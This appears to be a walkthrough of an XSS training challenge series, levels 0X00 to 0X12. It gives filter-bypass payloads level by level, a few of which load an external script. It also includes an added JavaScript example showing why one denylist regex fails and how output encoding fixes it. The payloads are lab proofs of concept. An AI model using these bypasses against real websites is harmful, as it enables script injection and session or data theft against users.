0X00
<a href=javascript:alert(1)>text</a>
0X01
</textarea><script>alert(1)</script><textarea>
0X02
"onclick="alert(1)
0X03
Ordinary input shows that () is filtered
<script>alert`1`</script>
0X04
Viewing the source shows that both () and ` are filtered
<svg><script>alert(1)</script>
0X05
--!><script>alert(1)</script>
0X06
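Viewing the source, the regular expression filters any string that starts with auto or on and ends with =, and also filters >
The newline character turns out not to be filtered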
type="image" src onerror
=alert(1)
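Why the 0X06 denylist fails and what a fix looks like, as an added example that is not part of the original page. The regex is reconstructed from the description above and is an assumption, as are all function and constant names.

```javascript
// Assumed reconstruction of the 0X06 filter from its description:
// replace "auto", "on...=" and ">" with "_". Not the challenge's own source.
const DENYLIST = /auto|on.*=|>/gi;

// Constructed sample inputs: the same attribute string, with and without
// a line break between the attribute name and "=".
const SAME_LINE = 'type="image" src onerror=alert(1)';
const SPLIT_LINE = 'type="image" src onerror\n=alert(1)';

// Weak form: input lands in attribute position after a denylist pass.
// "." does not match a newline (no "s" flag), so "on.*=" never reaches
// an "=" that sits on the next line.
function denylistRender(input) {
  return `<input value=1 ${input.replace(DENYLIST, '_')} type="text">`;
}

// Hardened form: treat input as data only. Entity-encode every character
// that can end or extend an attribute and keep it inside a quoted value.
function escapeAttr(s) {
  return s.replace(/[&<>"'`=\s]/g, (c) => `&#${c.charCodeAt(0)};`);
}

function safeRender(input) {
  return `<input value="${escapeAttr(input)}" type="text">`;
}

// Check used below: does the markup still carry an event-handler attribute
// (whitespace, "on<name>", optional whitespace including newlines, "=")?
function hasEventHandler(html) {
  return /\son\w+\s*=/i.test(html);
}

function report() {
  return {
    denylistSameLine: hasEventHandler(denylistRender(SAME_LINE)),
    denylistSplitLine: hasEventHandler(denylistRender(SPLIT_LINE)),
    escapedSplitLine: hasEventHandler(safeRender(SPLIT_LINE)),
  };
}

console.log(report());
```

The denylist only blocks the single-line spelling; output encoding removes the attribute context altogether, so the spelling of the input no longer matters.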
0X07
<img src onerror='alert(1)'
0X08
0X09
http://www.segmentfault.com"></script><img src onerror="alert(1)"
0X0A
https://www.segmentfault.com.haozi.me/j.js
0X0B
<img src onerror=alert(1)>
0X0C
<img src onerror=alert(1)>
0X0D
alert(1);
-->
0X0E
<ſcript src=https://www.segmentfault.com.haozi.me/j.js></script>
0X0F
');alert('1
0X10
alert(1)
0X11
");alert("1
0X12
</script>
<script>alert(1)</script>